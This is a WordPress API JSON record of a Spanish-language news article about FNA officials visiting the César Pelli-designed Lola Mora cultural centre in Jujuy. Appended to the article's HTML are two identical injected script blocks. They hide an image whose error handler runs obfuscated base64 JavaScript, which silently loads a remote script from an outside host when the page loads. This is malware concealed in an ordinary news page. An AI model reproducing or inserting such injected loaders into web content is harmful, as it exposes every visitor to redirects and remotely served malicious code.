{"id":5337,"date":"2025-07-16T09:43:52","date_gmt":"2025-07-16T12:43:52","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5337"},"modified":"2025-08-13T23:26:26","modified_gmt":"2025-08-14T02:26:26","slug":"el-lola-mora-uniendo-el-arte-mundial-y-nacional-en-jujuy","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5337","title":{"rendered":"El Lola Mora: uniendo el arte mundial y nacional en Jujuy"},"content":{"rendered":"\n<p><strong>Tulio Horacio Andreussi Guzm\u00e1n<\/strong>, presidente del FNA, y\u00a0<strong>Miguel \u00c1ngel Pereira<\/strong>, director de cine juje\u00f1o y miembro del directorio del FNA recorrieron las\u00a0<a href=\"https:\/\/prensa.jujuy.gob.ar\/obras-a812\" target=\"_blank\" rel=\"noreferrer noopener\">obras del espacio en construcci\u00f3n<\/a>\u00a0junto a\u00a0<strong>Ramiro Tejeda<\/strong>, secretario de Planificaci\u00f3n, y se mostraron gratamente sorprendidos por la magnitud del proyecto y por el dise\u00f1o del reconocido arquitecto tucumano C\u00e9sar Pelli.<\/p>\n\n\n\n<p>Andreussi Guzm\u00e1n expres\u00f3: \u201ceste gran proyecto genera mucha inquietud en Buenos Aires y, particularmente para m\u00ed, que soy juje\u00f1o, es muy importante que Jujuy cuente con este espacio para cobijar las esculturas de Lola Mora, que est\u00e9n seguras, resguardadas, y que se le rinda homenaje a una de las artistas m\u00e1s sobresalientes del norte argentino\u201d.<\/p>\n\n\n\n<p>\u201c<strong>La obra de C\u00e9sar Pelli ya es un homenaje en s\u00ed mismo: un tucumano reconocido en el mundo, cuya arquitectura va a convertir al Centro Cultural en un punto de referencia en el NOa<\/strong>\u201d, a\u00f1adi\u00f3, y destac\u00f3 que \u201c<strong>los juje\u00f1os han plantado la semilla para que el norte cuente con un museo de envergadura nacional, posicionando a Jujuy como centro cultural de toda la regi\u00f3n\u201d.<\/strong><\/p>\n\n\n\n<p>Pereira valor\u00f3 tambi\u00e9n las obras en relaci\u00f3n a su experiencia: \u201ccaminando por esta \u00faltima obra de C\u00e9sar Pelli, record\u00e9 cuando tuve la oportunidad de entrevistarlo en su estudio en Pensilvania, hablamos mucho de Jujuy, y hoy siento un gran orgullo al saber que la provincia cuenta con un proyecto hoy haci\u00e9ndose realidad de este gran artista tucumano, dedicado exclusivamente a preservar la obra en Jujuy de otra gran artista\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/prensa.jujuy.gob.ar\/lola-mora\/centro-cultural-lola-mora-miradas-expertas-destacan-una-obra-que-hace-crecer-jujuy-n119383\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" width=\"396\" height=\"214\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/Captura-de-pantalla_16-7-2025_93417_prensa.jujuy_.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-5338\" style=\"width:137px;height:auto\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/Captura-de-pantalla_16-7-2025_93417_prensa.jujuy_.gob_.ar_.jpeg 396w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/Captura-de-pantalla_16-7-2025_93417_prensa.jujuy_.gob_.ar_-300x162.jpeg 300w\" sizes=\"(max-width: 396px) 100vw, 396px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Tulio Horacio Andreussi Guzm\u00e1n, presidente del FNA, y\u00a0Miguel \u00c1ngel Pereira, director de cine juje\u00f1o y miembro del directorio del FNA recorrieron las\u00a0obras del espacio en construcci\u00f3n\u00a0junto a\u00a0Ramiro Tejeda, secretario de Planificaci\u00f3n, y se mostraron gratamente sorprendidos por la magnitud del proyecto y por el dise\u00f1o del reconocido arquitecto tucumano C\u00e9sar Pelli. Andreussi Guzm\u00e1n expres\u00f3: \u201ceste [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5339,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22,17],"tags":[],"class_list":{"0":"post-5337","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5337"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5337"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5337\/revisions"}],"predecessor-version":[{"id":6439,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5337\/revisions\/6439"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5339"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5337"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5337"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5337"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}